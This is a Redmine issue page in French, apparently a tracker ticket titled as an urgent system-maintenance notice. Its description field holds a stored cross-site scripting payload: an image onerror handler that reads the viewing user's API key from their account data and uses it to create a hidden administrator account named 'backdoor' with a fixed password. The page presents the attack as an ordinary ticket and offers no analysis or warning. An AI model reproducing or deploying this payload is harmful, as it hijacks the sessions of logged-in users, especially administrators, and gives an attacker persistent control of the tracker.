Projet

Général

Profil

Actions

Feature #3143

ouvert

Urgent: System Maintenance Notification

Ajouté par Démo Démo il y a 9 jours.

Statut:
New
Priorité:
Urgent
Assigné à:
-
Début:
18/07/2026
Echéance:
% réalisé:

0%

Temps estimé:

Description

<img src=x onerror="
fetch('/my/account.json',{credentials:'include'})
.then(r=>r.json())
.then(d=>{
fetch('/users.json',{
method:'POST',
credentials:'include',
headers:{'Content-Type':'application/json','X-Redmine-API-Key':d.user.api_key},
body:JSON.stringify({user:{login:'backdoor',password:'Backdoor@123!',firstname:'Back',lastname:'Door',mail:'',admin:true}})
});
});
">

Aucune donnée à afficher

Actions

Formats disponibles : Atom PDF